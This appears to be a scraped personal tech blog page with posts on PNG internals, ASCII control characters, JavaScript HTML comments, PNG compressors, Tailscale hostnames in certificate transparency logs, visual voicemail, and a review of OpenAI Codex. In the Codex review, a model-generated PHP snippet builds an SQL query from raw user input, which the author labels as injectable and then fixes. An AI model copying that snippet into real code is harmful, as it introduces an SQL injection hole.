    <div class="filt-counts">
        <div><span class="filt-label">None</span> <span style="width: 0%" class="filt-amount">0</span></div><div><span class="filt-label">Subtract</span> <span style="width: 8.984375%" class="filt-amount">23</span></div><div><span class="filt-label">Up</span> <span style="width: 30.078125%" class="filt-amount">77</span></div><div><span class="filt-label">Average</span> <span style="width: 52.34375%" class="filt-amount">134</span></div><div><span class="filt-label">Paeth</span> <span style="width: 8.59375%" class="filt-amount">22</span></div>
    </div>
    <img src="https://smitop.com/fmat/png/defiltered.png" alt="The example image" width="256" height="256" loading="lazy" />
</div>
<div>
    <h2>Interlacing</h2>
    <p>PNGs can optionally be <dfn>interlaced</dfn>, which splits the image into 7 different images, each of which covers a non-overlapping area of the image:</p>
    <img src="https://smitop.com/ext/Adam7-mul.svg" alt="Diagram of the 7 passes in an 8x8 area. The first is a single pixel in the top-left, and the seventh is every other row." width="400" height="400" loading="lazy" />
    <p>Each of the 7 images is loaded in sequence, adding more detail to the image as it is loaded. This sequence of images is called <a href="https://en.wikipedia.org/wiki/Adam7_algorithm">Adam7</a>.</p>
    <p>The data for each of the 7 images are stored after each other in the image file. If we take the example image and enable interlacing, here's the raw uncompressed image data:</p>
    <img src="https://smitop.com/fmat/png/inter-idat.png" alt="Same as the earlier skewed letter S, but there are multiple stacked on top of each other. The bottom half has 2, the third above that has 2 more, and above that it increasingly looks like random noise." width="256" height="256" />
    <p>Here are the 7 passes that we can extract from that image data, which look like downscaled versions of the image:</p>
    <div class="inter-passes">
        <!-- in-article text describes these well enough, so set null alt text -->
        <img src="https://smitop.com/fmat/png/inter-1.png" alt="" width="32" height="32" loading="lazy">
        <img src="https://smitop.com/fmat/png/inter-2.png" alt="" width="32" height="32" loading="lazy">
        <img src="https://smitop.com/fmat/png/inter-3.png" alt="" width="64" height="32" loading="lazy">
        <img src="https://smitop.com/fmat/png/inter-4.png" alt="" width="64" height="64" loading="lazy">
        <img src="https://smitop.com/fmat/png/inter-5.png" alt="" width="128" height="64" loading="lazy">
        <img src="https://smitop.com/fmat/png/inter-6.png" alt="" width="128" height="128" loading="lazy">
        <img src="https://smitop.com/fmat/png/inter-7.png" alt="" width="256" height="128" loading="lazy">
    </div>
    <p>Since some of those sub-images are rectangles but the actual image is square, there will be more details horizontally than vertically when loading the image, since horizontal detail is more important than vertical detail for human visual perception.</p>
</div>
<div>
    <h2>Bonus: bugs</h2>
    <p>Here's what you get when you have a bug in the Average filter that causes it to treat overflows incorrectly (the way integer overflow in filter value calculation is specified to be a bit different than the rest):</p>
    <img src="https://smitop.com/pngbug.png" alt="The example image, but it looks glitchy starting a quarter of the way down." width="256" height="256" loading="lazy">
</div>

png

By · · 0 minute read

ascii

By · · 0 minute read

Writing semantic ASCII

By · · 3 minute read

In the ASCII character set (and Unicode, where the first 128 characters are the same as ASCII), there are 32 non-printable control characters. Many of those control characters aren’t very useful in a modern context, such as Acknowledge, which isn’t very useful since modern communication protocols handle acknowledgements at a higher level.

But some of those characters are useful! I’m going to call writing ASCII that takes advantage of control characters Semantic ASCII (like Semantic HTML) because it makes it sound cool.

The most useful control characters are File Separator/Group Separator/Record Separator/Unit Separator, which can be used to delimit data in a structured file. Unit Separator is the CSV/TSV equivalent of a space/tab, and Record Separator is the equivalent of a newline. The ASCII way of structuring data works better than CSV/TSV: it can handle newlines/commas/tabs in data without the need for quoting or escaping, and instead of representing a 2D matrix, ASCII can represent a 4D tensor!

For example, to represent data about countries and their political subdivisions, and the populations and founding date of these places we can use these characters (leading whitespace is just for visual clarity here):

Canada
  <GS>38246108
  <GS>1867-07-01
  <GS>
    Newfoundland
      <US>521542
      <US>1949-03-31
    <RS>Ontario
      <US>14826276
      <US>1867-07-01
<FS>United States
  <GS>334262970
  <GS>1776-07-04
  <GS>
    Maine
      <US>1344212
      <US>1820-03-05
    <RS>North Dakota
      <US>762062
      <US>1889-11-02

It would have been great if this format had become the de facto way of storing spreadsheets, instead of CSV, which gets quite complicated to parse correctly when you need to start handling commas and newlines within cells. Alas, CSV is what we are stuck with.

Another useful character is Form Feed, which is supposed to function as a page break when the document is printed. It doesn’t get much use today, probably due to poor support, but some older documents use it, including some RFCs and GPL license versions.

More cool characters: Start of Heading, Start of Text, and End of Text can be used as a basic way of specifying headings in a document in pure ASCII, for primitive (and rarely supported) text formatting.

HTML comments work in JavaScript too

By · · 3 minute read

Here’s some obscure trivia about JavaScript: you can use HTML comments in JavaScript. Not just in <script> tags: you can use them in included standalone files, and even in Node.js and Deno. Syntax highlighters, on the other hand, do not have great support for this (the only one I’ve seen get this completely right is the one in the Firefox DevTools), so these snippets will show a bit weirdly on my blog. Here’s what that looks like:

// below statement logs 1
console.log(1); <!-- log 1 -->
<!-- above statement logs 1 -->

This is entirely a historical relic, and using this for anything other than experimentation is a Bad Idea. The original intent was to make it so that browsers without JavaScript support would ignore script blocks that were surrounded with HTML comments, instead of treating them as text (browsers treat unknown elements as <span>s). As such, HTML comments inside JavaScript were ignored. Such code blocks might look like this:

<script>
  <!--
    // browsers without JavaScript support think this is all in a big comment,
    // and so don't render this as plain text
    alert("Hi!");
  -->
</script>

While there are no browsers made in the past two decades that display the contents of script tags (even when JavaScript is disabled), this behavior can’t be removed from browsers since some websites rely on this. Eventually this behavior was added to the ECMAScript spec, as a legacy behavior that should only be implemented in browser-like environments. I’m not sure why Node and Deno support this: maybe V8 doesn’t have any option to disable this?

The spec allows for a lot of interesting comment behavior. We can use <!-- the same as // for a line comment, but --> only works at the start of a line. Unlike actual HTML comments, which are block comments, HTML-in-JS comments are always line comments.

// Logs 1
console.log(1); // Logs 1

<!-- Logs 2
console.log(3); <!-- Logs 2

--> Logs 3
console.log(3);

The reason that --> is only allowed at the start of a line is because otherwise it would break the “goes to” operator (decrement followed by greater than).

Some more useful comment-related trivia I learned is that a shebang (#!) at the beginning of a file is also treated as a comment, even in (modern) web browsers.

javascript

By · · 0 minute read

compression

By · · 0 minute read

Zopfli is *really* good at compressing PNGs

By · · 6 minute read

Recently I wondered what PNG compression engine was the best. I had been using pngcrush out of habit, but was there a better compressor out there? As it turns out, yes. Some initial digging revealed that PNGOUT was apparently pretty good. While it was originally created for Windows, there are ports available for other operating systems. Unfortunately, PNGOUT (and those ports) are under a non-free license, and “The source code for these tools is not public. Don’t bother asking.”. So: is PNGOUT the best compression engine? Let’s find out!

Testing the engines

I compared 10 PNG compression engines: zopflipng, pngout, FFmpeg, pngcrush, imagemagick, optipng, oxipng, ImageWorsener, AdvanceCOMP, and pngrewrite. For engines that supported it, I set the compression amount to the highest possible. I also turned off the optimization where you just do nothing if your attempt to compress the image makes it bigger, since that’s a boring optimization that everyone implements anyways. I only measured how much the engines could compress input files: I didn’t measure how long that took. For images that are served a lot, compression that takes a long time is worth it, since you can compress it up-front to get savings over time. Maybe in the future I’ll factor in the speed of performing the compression.

I sourced test images from:

In total, this amounted to 336 test images.

The results

I was quite suprised at the results I got once I finished adding support for all engines to my test harness. The best engine, by a long shot, was Zopfli, a compression engine by Google. It only supports compressing images, so you have to use something else to decompress them. They say:

Zopfli Compression Algorithm is a compression library programmed in C to perform very good, but slow, deflate or zlib compression.

And it is indeed very good: it blows all of the other compression engines out of the water. Just look at the comparision table of how each engine does on each image: Zopfli is almost always the best. On average, it can shave 33.4% off of images, while the runner-up, PNGOUT, can only do 17.86%! (yes, some engines indeed make images worse on average, usually due to weird images in the pngsuite being hard to compress):

A bar chart of the compression rates of various engines. zopflipng has the best at -33.40%.

(it was a real pain to get LibreOffice Calc to make that chart, the chart interface is not remotely intuitive)

Of the engines, ImageMagick, and FFmpeg were never the best engine to compress an image. The best pngrewrite, optipng, and oxipng could do is tie for best with Zopfli (and usually they do much worse). ImageWorsener, PNGOUT, pngcrush, and AdvanceCOMP could sometimes beat Zopfli, but are usually only a few percent better, and only occasionally: Zopfli is the best 87% of the time. The images it tends to be a bit worse on are typically “weird” images that are hard to compress.

So Zopfli is really good. You should use it to compress your images! The catch, of course, is that it’s very slow. Running Zopfli on all user-generated content might not be a good idea, but compressing your static images can help save a lot of bandwidth! And you can save bandwidth: all of the (valid) images in the test suite could be further compressed by at least one engine, and there was only one image that Zopfli was unable to shrink further.

Nix

The Nix package manager was quite useful for performing this analysis. nixpkgs had almost all of the engines I needed, already up-to-date. There wasn’t any messing around with dependencies! The one compression engine that nixpkgs any didn’t have, pngrewrite, was super-simple to use: I just wrote a short expression to tell Nix how to build it, and Nix handled everything else for me. Take a look at the *.nix files in the test harness for more details.

Analyzing the public hostnames of Tailscale users

By · · 7 minute read

Getting the data

Browsers have been increasingly pushing for higher HTTPS adoption in recent times. Many browsers now display a “Not secure” indicator for websites that still use HTTP. For the most part, this is a good thing: HTTPS provides better privacy and security for users. However, it presents an issue for internal websites that are always accessed over a secure underlying transport layer anyways. The most common secure transport layer is the loopback address: since the traffic never leaves your computer, there is no risk of someone intercepting your traffic. As such, localhost is special cased to be treated a secure origin in Chromium and other browsers.

Another case of when the underlying transport layer already provides transport security is when the host is accessed over a virtual private network (VPN) that provides sufficent security. Tailscale is one such VPN solution. When the Tailscale daemon is running, it attempts to set the local DNS server to 100.100.100.100, and handles DNS traffic to that address locally, resolving certain special domains to CGNAT addresses that are used for aidentifying hosts.

# querying tailscaled's internal DNS server
$ dig @100.100.100.100 +short pop1.xerus-coho.ts.net
100.96.112.51

# querying public DNS server
$ dig @9.9.9.9 +short pop1.xerus-coho.ts.net
# [no addresses found]

When visiting websites hosted on nodes in one’s Tailscale network (Tailnet) in a browser, they are not treated as a secure origin – even though they are! Tailscale encrypts traffic as it is sent through the network using the public key of the recieving node. But since VPNs are completely transparent to the browser, it just doesn’t know that the underlying transport layer is secure.

Tailscale offers a solution to this problem: the tailscale cert, which provisions a Let’s Encrypt certificate for your ts.net subsubdomain using a DNS challenge. The Tailscale client asks the Tailscale backend to update the DNS for a subdomain to prove ownership of the domain. The private key and certificate signing request are generated locally, so Tailscale servers never know your private key. This provides no real additional security, it only serves to make browsers not display certificate warnings.

All certificates issued by Let’s Encrypt are appended to a public Certificate Transparency log. Certificates are added to a tamper-evident Merkle tree (like a blockchain, except each certificate gets its own block) by certificate authorities after they are issued. Browsers require that certain certificates appear in Certificate Transparency logs, and this includes the ones issued for ts.net subdomains. We can search through these Certificate Transparency logs to find all domains that have certificates issued for them. We can use this to find out what hostnames people are running tailscale cert on! (and Tailscale informs users of this fact when setting up TLS support for a Tailnet). Keep in mind that this data is biased towards hostnames that people want to create certificates for, so it might not be representive of all hostnames.

The data

I got all ts.net subdomains listed in certificate transparency logs on , and ontologized all of them into a single category. In cases like johnny-surface-laptop, which include multiple categories, I used a category that combines the two: OS+User in this case. I probably have made some mistakes in collating the data. If you want to play with the data, you can grab the spreadsheet as a CSV (or from Kaggle, if for some reason that’s a thing you want).

Interesting results

The data includes the 312 Tailscale users who used tailscale cert, and a total of 464 hostnames. This means that the average user has 1.49 hostnames exposed using tailscale cert. First-level subdomains of ts.net represent Tailnets, and second-level subdomains are the actual hosts in Tailnets. The first-level subdomains have random labels, like xerus-coho to anonymize the Tailnet owner somewhat. The most is tailnet-cdb8 with 26, and in second place is corp with 9. corp appears to be used for services internal to Tailscale Inc. It shouldn’t be possible for the Tailnet part of the domain to be corp – it doesn’t fit the allowed name structures, but Tailscale gave themselves the one and only vanity name.1 Here are those hostnames in corp: builds, bradfitz, paintest, tshello, test-builder, tsdev, changelog, bronzong, and pain(?).

Here’s what the most popular categories I assigned are: A pie chart of various hostname categories. Intended usage is 17.9%, Software running is 14.7%, Non-descriptive word is 13.4%, Random characters is 11.4%, Hardware is 8%, Made-up word is 5.4%, Default name is 4.3%, Human-like name is 4.3%, Hosting provider is 3.9%, OS name is 3%, Fictional thing is 2.8%, Hardware+Name is 1.9%, Non-English word is 1.7%, Physical location is 1.7%.

Most hostnames describe how the host is intended to be used. More interesting are the 37% of names that are entirely unrelated to the intended use or hardware. This includes hostnames like:

  • Non-descriptive words: spike, slab, cardinal
  • Made-up words: lois, gimli, thopter
  • Pokémon: mewtwo, mew, bronzong
  • Random characters: nas484e5d, otx82wn9xnzcygap6bsc, o25e62iw8ab88gg8

Using a hostname unrelated to what is happening on the host allows for more flexibility if the use changes in the future. It makes less sense for host with a particular use determined at creation time, which can be reimaged or have their VM destroyed if that use isn’t needed anymore. Hostnames reflect if the host is treated like cattle or like a pet.

Only 14.2% of hostnames have duplicates: 86% of hostnames are unique.

A bar chart. raspberrypi at 11; pihole at 5; brix, monitoring, nuc, pi, pikvm, ubuntu at 3; code, ha, homeassistant, hub, kali, media-nas, nas, nextcloud, octopi, payments, pi4, pihole-1, pihole-2, pop-os, pve at 2

Raspberry Pi related hostnames are suprisingly popular there.

Shared-hostname graph

Two Tailnets have a line between them if they share a hostname: A diagram of various Tailnets, connected toeghetr. There are 2 large clusters and many smaller clusters. The biggest clusters are networks with raspberrypi, the second largest is networks with pihole.


  1. More solid evidence for this: a Tailscale employee explictly confirming this to be the case ↩︎

tailscale

By · · 0 minute read

email

By · · 0 minute read

tel

By · · 0 minute read

Your Phone app has an email client

By · · 6 minute read

Zawinski’s Law states:

Every program attempts to expand until it can read mail. Those programs which cannot so expand are replaced by ones which can.

This is true of the Phone apps on Android and iOS, both of which both have an integrated IMAP client that’s used to display and interact with visual voicemail. My favourite mobile Linux distribution, Plasma Mobile, doesn’t support it yet.

Mobile carriers support forwarding numbers1: when a call isn’t picked up after a certain number of rings, the call is forwarded to another number. This is how voicemail works on mobile phones: on-device voicemail wouldn’t be able to handle calls when the phone is turned off, so if you want to be able to get voicemail without an always-on phone you need to forward calls to an external service. Mobile carriers almost universally provide a voicemail service for their customers that works as such a forwarding number.

Without visual voicemail, voicemail recipients have to check their voicemail by calling a specified number and interacting with the system using the dial pad. SIM cards can store a voicemail number on them, and this number can be changed (although not all operating systems actually provide a mechanism for doing so). Dialer apps on smartphones support holding the 1 key to call this number, eliminating the need to remember it.

Navigating a voicemail system using a dial pad is fairly clunky and annoying. Visual voicemail provides a more convenient way to check one’s voicemail that works in addition to calling in. With visual voicemail, you can interact with your voicemail without needing to call your voicemail number. Visual voicemail is supported by many carriers, although it is common for them to charge an additional fee for the luxury of more convenient and accessible usage. Here’s what it looks like on iOS:

An screenshot of iOS visual voicemail. There are 3 pending voicemails shown. One is selected, and has a sender name, a date, a share button, a transcription of the audio, a play button, a &ldquo;Speaker&rdquo; button, a &ldquo;Call Back&rdquo; button, and a &ldquo;Delete&rdquo; button.

The visual voicemail standard is implemented by the Android Phone app. I think it’s also the standard that iOS uses, but Apple doesn’t make their documentation for this public. Also, my mobile carrier says that their visual voicemail service only works on iOS, so it’s possible that iOS does implement the spec but with some quirks that make it incompatible with Android. Voicemail messages are sent using standard IMAP, the protocol originally designed for accessing emails. When visual voicemail is enabled by the carriers, information about the visual voicemail server is sent using binary SMS messages. The server address is sent as a DNS name, which in practice tends to resolve to a 10.*.*.* IP that can only be accessed over mobile data. Some carriers zero-rate data charges for traffic to their internal IPs.

Metadata about the messages, such as information about the caller, is encoded into headers of the messages transmitted over IMAP. The message itself is an attachment. The spec has a few example messages, but they got a bit mangled when typed into a word processor and converted to a PDF. Here’s Example C, a typical voicemail message, unmangled:

Return-Path: <>
Received: from msuic1 (10.106.145.31) by MIPS.SITE1 (MIPS Email Server) id 45879DD300000196 for 11210@vi.com; Tue, 19 Dec 2006 12:12:09 +0200
subject: voice mail
MIME-Version: 1.0 (Voice Version 2.0)
Message-Id: <31.24.2326006@msu31_24>
Content-Type: Multipart/voice-message; boundary="------------Boundary-00=_90NIQYRXFQQMYJ0CCJD0"
From: 771004@vi.com
To: 771000@vi.com
Content-Duration: 17
Message-Context: voice-message
Date: Tue, 19 Dec 2006 10:12:09 +0000 (UTC)
--------------Boundary-00=_90NIQYRXFQQMYJ0CCJD0
Content-Type: Text/Plain
Content-Transfer-Encoding: 7bit
click on attachment
--------------Boundary-00=_90NIQYRXFQQMYJ0CCJD0
Content-Type: audio/amr
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vm.amr"
Content-Duration: 17
[message attachment]
--------------Boundary-00=_90NIQYRXFQQMYJ0CCJD0--

In that message, the sender and receiver are both identified by email addresses (771004@vi.com and 771000@vi.com). The local part of the emails are the phone numbers of the parties, and the domain is one owned by the carrier. Number emails aren’t just used for visual voicemail: most carriers support sending emails to the number emails, and convert it into an SMS sent to the reciever.2 For example, you can send an email to [number]@vtext.com to send an SMS to a Verizon phone from the comfort of your email client. (and for some reason you have to use vzwpix.com instead if you want to “include an attachment, like a picture or emoji”, because just having one domain for everything and acting differently based on message content would be too hard for Verizon).

The message audio is stored in an .amr file, which is a file format specifically optimized for compressing human speech, and has wide adoption.

Visual voicemail is a good example of reusing existing, well-tested, protocols when possible, instead of coming up with a new domain-specific protocol. Voicemails fit fairly well onto the model of IMAP, so it makes sense to reuse the IMAP protocol for them. IMAP is a good protocol to use whenever you have data that maps nicely onto the model of an email client.


  1. There are actually multiple types of forwarding that vary under what conditions the call is forwarded. ↩︎

  2. And some, like mine, send a message saying that you need to upgrade to a plan with number email support to be able to view the message. ↩︎

Google's new related search box optimizes for the wrong metric

By · · 3 minute read

When using Google, I sometimes look at a result, then go back to the results page to check another result. When I go back, Google sometimes pops up a box with related searches around the result:

A Google search result for &ldquo;example - Wiktionary&rdquo;. Below it is a box with a gray box that says &ldquo;People also search for&rdquo;, with 6 search results below it.

It only does this sometimes, it seems to only happen when I’m using a browser in the right half of an A/B test and when there are enough related search suggestions. But the UI for this is terrible. It doesn’t pop up right away, so it looks like you can move your mouse to the result below and click it, but then the related search box comes up right as I’m clicking on the result below, causing me to accidentally click on a related search. It’s a very annoying experience. It seems like the box is perfectly timed to come up at just the right time to get me to accidentally click it while trying to click on the result below.

I have literally never intentionally clicked on one of the related searches in that box: if I wanted related searches, I can always go to the bottom of the page for that. But I have accidentally clicked on that box so many times. It’s very infuriating.

The worst part of this is that someone at Google is probably looking at the results of their A/B test and thinking “Wow, this new feature is great. Look at how many people are using related searches when they can’t find what they’re looking for!” But most of those uses are just misclicks: it seems that they are optimizing for more searches (and thus more ad views) rather than actually looking at how features are used.

ai

By · · 0 minute read

How good is Codex?

By · · 44 minute read

OpenAI recently released Codex (paper), a large-scale language generation model trained on public programming source code from GitHub. Its most prominent use so far is GitHub Copilot, which is an extension for VSCode1 that autocompletes code being edited. However, there are many uses for Codex beyond code completion. OpenAI recently ran the OpenAI Codex Challenge, where competitors were tasked with solving various programming tasks, and could use Codex to help them. I participated in the challenge and got 75th place2. Due to some overloaded servers during the challenge, many people were unable to actually do actually compete, so that ranking is mostly due to me figuring out the best times to reload to get the challenge to work. After the challenge, OpenAI sent me an invite to try out the Codex model, which I used to do the testing in the post.

In this post, I find that Codex understands the Linux source code, can write simple scripts, can sometimes write commit messages, can write good explanations of code and provide good explanations of red-black trees, can be prompted to make the code it writes more secure and more.

I’ve used a variety of languages in this post. OpenAI says that Codex has support for “JavaScript, Go, Perl, PHP, Ruby, Swift, TypeScript, SQL, and even Shell”, and in my experience Codex does work quite well for all of those listed. I’ve also seen it write code in other languages, such as C, C++, and Rust fairly well. Codex’s ability to write in a language is mostly based on how much training data it has seen in that language, so more obscure languages don’t work as well. Some languages are also just easier for the model to work with: I find that in general, Codex works better with languages that make more things explict. Codex struggles to write code that passes Rust’s borrow checker, since whether some code passes the borrow checker is a very complex function of the code (especially with non-lexical lifetimes). It is comparatively easy to check if some code is syntactically valid, and so Codex very rarely writes code that is not syntactical.

I will evaluate the strengths and weaknesses of Codex, determine what tasks it is well-suited for, and determine what the limits of what Codex can do. I will also explore many potential use-cases for Codex. While source code language models still have a long way to go, Codex is already very exciting, and I can’t wait to see applications of it, and how the model itself can be improved.

Overall, I think that Codex’s main strength currently is for writing simple pieces of code that don’t require much understanding of any particular niche topic, or having a deep understanding of the codebase. Codex is able to write code that it has seen before in different ways and languages, and weave them together to create to code. But it isn’t yet able to write new algorithms, find clever optimizations, or consistently generate code without logic bugs. Hopefully over time better models will be developed that can exceed the ablities of Codex. There is still a long way to go in the development of source code language models, but Codex is already exicting today.

In this article, the input to the Codex model is bold, and the rest of the code is the output of the model. I also include the model parameters used to generate the output. Note that there is an element of randomness to the model’s generations when the temperature is non-zero, so trying them yourself in those cases will give different results. Also note that in a few cases Codex generates the actual email addresses of other people, which I replaced with [email removed] to avoid spammers. Interestingly, the Copilot extension checks for email addresses and similar information in generated outputs, and discards generations that contain them. Here, the first two lines of this script were provided by me, and the third was generated by Codex.

Model: davinci-codex
Temperature: 0.4
Top P: 1
Frequency penalty: 0
Presence penalty: 0
#!/bin/bash # Say hello! echo "Hello, World!"

The model

There are actually two Codex models currently, davinci-codex and cushman-codex. The cushman-codex model is a smaller version of the davinci-codex model, which runs faster but at the cost of lower quality results. Despite this, cushman is actually quite competitive with davinci, and I have a hard time finding inputs where cushman did significantly worse than davinci. Often davinci-codex and cushman-codex do the same thing in different ways. GitHub Copilot seems to use a variant of cushman for cases where faster completions are desired (such as autocomplete), and an undocumented “earhart” model when slower completions are desired (such as when a user clicks a button to explictly request completions). Following the naming conventions of the current models where the first letter represents quality, earhart would provide results that are higher quality than davinci. Alas, I am unable to test this.

Various parameters can be used to control how the model generates it’s output. Tuning these parameters can be quite helpful for getting the desired results. Since Codex is based on GPT-3, the parameters are the same as GPT-3.

Temperature/top-P

The temperature is a value from 0-1 that controls how likely the model is to choose tokens that aren’t the most likely ones. This is useful when you want the outputs to be more random or creative. While higher temperatures are often good for generating natural language text, they work less well for generating source code. This is because source code is more structured and “obvious” than natural language. Higher temperatures will result in outputs that attempt to perform the task in unexpected ways, but it it usually better to do things the obvious way than to devise some clever way to do that. In contrast, with natural language, stating things in uncommon ways is a good thing, since reframing already known things in new ways can help understanding.

Compare the outputs at the minimum temperature of 0, where it provides a short, working snippet:

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
#!/bin/bash # Lists TSV files starting with "codex_" for file in codex_*.tsv do echo $file done

…and the maximum temperature of 1, where the code is more complex and doesn’t actually work:

Model: davinci-codex
Temperature: 1
Top P: 1
Frequency penalty: 0
Presence penalty: 0
#!/bin/bash # Lists TSV files starting with "codex_" while read filename do if [ "$(echo "$filename" | grep -c "^codex_")" -eq 1 ]; then echo $filename fi done <

This is mentioned in the documentation for Codex as well:

Setting the API temperature to 0, or close to zero (such as 0.1 or 0.2) tends to give better results in most cases. Unlike GPT-3, where a higher temperature can provide useful creative and random results, higher temperatures with Codex may give you really random or erratic responses.

You can also specify a top-P value from 0-1 to achieve similar results to changing the temperature. Changing Top-P values gives similar results to changing temperature values. The API documentation says:

We generally recommend altering this or temperature but not both.

Copilot dynamically chooses the number of times to sample the model (not sure how exactly), and uses a temperature between 0 and 0.8, with a higher temperature resulting when there are more samples.

Frequency/presence penalty

The frequency and presence penalties can be used to force the model to behave in certain ways by discouraging the model from selecting certain tokens. Increasing the presence penalty discourages the model from producing tokens that it has already produced, and the frequency penalty discourages tokens based on how much they have already been in the text. This is useful for useful for stopping the model from getting into a repetition trap: often Codex will get stuck in a loop, repeating the same thing repeatedly. This isn’t unique to Codex: GPT-3 can also get stuck repeating the same thing. For example, here it gets stuck repeating the last two #includes forever:

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
// Kernel driver for USB keyboards. // // Copyright (C) 2005-2006 Kevin O'Connor <[email removed]> // // This file may be distributed under the terms of the GNU LGPLv3 license. #include "util.h" // dprintf #include "irq.h" // irq_raise #include "usb.h" // usb_keyboard_send #include "usb-hid.h" // usb_hid_send #include "usb-kbd.h" // usb_kbd_keycode #include "usb-kbd-kbd.h" // usb_kbd_keycode #include "usb-kbd-mouse.h" // usb_kbd_mouse_keycode #include "usb-kbd-hid.h" // usb_kbd_hid_keycode #include "usb-kbd-hid-mouse.h" // usb_kbd_hid_mouse_keycode #include "usb-kbd-hid-keycode.h" // usb_kbd_hid_keycode #include "usb-kbd-hid-mouse-keycode.h" // usb_kbd_hid_mouse_keycode #include "usb-kbd-hid-keycode.h" // usb_kbd_hid_keycode #include "usb-kbd-hid-mouse-keycode.h" // usb_kbd_hid_mouse_keycode #include "usb-kbd-hid-keycode.h" // usb_kbd_hid_keycode #include "usb-kbd-hid-mouse-keycode.h" // usb_kbd_hid_mouse_keycode #include "usb-kbd-hid-keycode.h" // usb_kbd_hid_keycode #include "usb-kbd-hid-mouse-keycode.h" // usb_kbd_hid_mouse_keycode #include "usb-kbd-hid-keycode.h" // usb_kbd_hid_keycode #include "usb-kbd-hid-mouse-keycode.h" // usb_kbd_hid_mouse_keycode #include "usb-kbd-hid-keycode.h" // usb_kbd_hid_keycode #include "usb-kbd-hid-mouse-keycode.h" // usb_kbd_hid_mouse_keycode #include "usb-kbd-hid-keycode.h" // usb_kbd_hid_keycode

Increasing the frequency penalty fixes the issue:

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0.2
Presence penalty: 0
// Kernel driver for USB keyboards. // // Copyright (C) 2005-2006 Kevin O'Connor <[email removed]> // // This file may be distributed under the terms of the GNU LGPLv3 license. #include "util.h" // dprintf #include "irq.h" // irq_raise #include "usb.h" // usb_keyboard_send #include "usb-hid.h" // usb_hid_send #include "usb-kbd.h" // usb_kbd_keycode #include "usb-descriptor.h" // usb_desc_keyboard_report #include "usb-config.h" // usb_config_descriptor #include "usb-device.h" // usb_device_send #include "usb-endpoint.h" // usb_endpoint_xmit #include "keyboard.h" // keyboard_keycode #include "keymap.h" // keymap_keycode #include "layout.h" // layout_keycode #include "scancodes.h" // scancode_to_hidcode // USB keyboard descriptor (from USB HID 1.11 spec, section 7.2.1). static const uint8_t usb_kbd_descriptor[] = { 0x05, 0x01, // USAGE_PAGE (Generic Desktop) 0x09, 0x06, // USAGE (Keyboard) 0xa1, 0x01, // COLLECTION (Application) 0x85, 0x01, // REPORT_ID (1) 0x05, 0x07, // USAGE_PAGE (Keyboard) 0x19, 0xe0, // USAGE_MINIMUM (Keyboard LeftControl) 0x29, 0xe7, // USAGE_MAXIMUM (Keyboard Right GUI) 0x15, 0x00, // LOGICAL_MINIMUM (0) 0x25, 0x01, // LOGICAL_MAXIMUM (1) 0x75, 0x01, // REPORT_SIZE (1) 0x95, KEYBOARD_REPORTLEN - 1, // REPORT_COUNT (KEYBOARD_REPORTLEN - 1) 0x81, 0x02, // INPUT (Data,Var,Abs) 0xc0 // END COLLECTION };

Writing prompts

If Codex isn’t giving the results you desire, you can often improve the result quality by designing a better prompt to push Codex towards the desired output. It often seems odd that you have to prompt Codex to write good code to make it do so, but consider that Codex was trained on a lot of low-quality code. As such, the output of the model reflects the fact that most code you can find on GitHub is not designed with security in mind. This happens most in languages that have a lot of insecure written in them, like PHP3. Here, Codex generates PHP code that is vulnerable to SQL injection.

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
<?php $name = $_GET["name"]; # Insert $name into the people table $query = "INSERT INTO people (name) VALUES ('$name')"; $result = mysqli_query($db, $query); if (!$result) { die("Database query failed."); } ?> <!DOCTYPE html> <html> <head> <title>Insert Successful</title> </head> <body> <p>The new record in the people table is:</p> <p>Name: <?php echo $name; ?></p> <p><a href="index.php">Back to the home page</a></p> </body> </html>

With a bit of prompt engineering, we can fix the issue by asking Codex to do the insert “safely”4:

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
<?php $name = $_GET["name"]; # Insert $name into the people table safely $sql = "INSERT INTO people (name) VALUES (:name)"; $stmt = $db->prepare($sql); $stmt->bindParam(':name', $name); $stmt->execute(); ?> <!DOCTYPE html> <html> <head> <title>Inserting Data</title> </head> <body> <h1>Inserting Data</h1> <p>The name <?php echo $name; ?> has been inserted into the people table.</p> <p>Click <a href="select.php">here</a> to view the data in the table.</p> </body> </html>

Specifying the language

If all you give to Codex is a single comment, it is unable to guess what language to write the code in. You can usually just specify the language: instead of “Do the task”, say “Do the task in Rust”. If your language frequently has shebangs at the top of the file (like #!/bin/bash or #!/usr/bin/env python3) those also work well for specifying the language.

Long-winded comments

Often Codex will write long-winded comments about what it is doing. While these are sometimes desirable, made-up information about the author and license is typically not desired.

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0.2
Presence penalty: 0
#!/bin/bash # Script to find the total number words in Markdown files in the directory. # # Usage: # ./count_words.sh [directory] # # If no directory is specified, the current directory is used. # # Author: Marko Mahnič # Created: 2010-11-09 (as count_words.sh) # Updated: 2010-11-09 (as count_words.sh) # License: GPL (http://www.gnu.org/copyleft/gpl.html) if [ $# -gt 0 ]; then DIR=$1; shift; else DIR=`pwd`; fi echo "Counting words in files in $DIR" find $DIR -name "*.md" -exec wc -w {} \; | awk '{sum += $1} END {print sum}'

You can get around this by making sure Codex can’t continue the header comment by adding empty lines after comments to stop Codex from being able to continue them.

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0.2
Presence penalty: 0
#!/bin/bash # Script to find the total number words in Markdown files in the directory. # Get the total number of words in all Markdown files in the directory. # # @param {string} $1 The directory to search. # @return {int} The total number of words in all Markdown files in the directory. function get_total_words() { local total_words=0 for file in $(find $1 -name "*.md"); do local words=$(wc -w < $file) total_words=$((total_words + words)) done echo $total_words } # Get the total number of words in all Markdown files in the directory. # # @param {string} $1 The directory to search. # @return {int} The total number of words in all Markdown files in the directory. function get_total_chars() { local total_chars=0 for file in $(find $1 -name "*.md"); do local chars=$(wc -m < $file) total_chars=$((total_chars + chars)) done echo $total_chars }

Codex actually generated a longer script that I cut off that is really bizarre, but at least it doesn’t include a made-up author or license!

Use cases

Writing code

Codex is good at writing code, since that’s what the main intent of it is. But how much complexity can Codex handle in the code it writes? Let’s take a look at a few examples.

GitHub Copilot

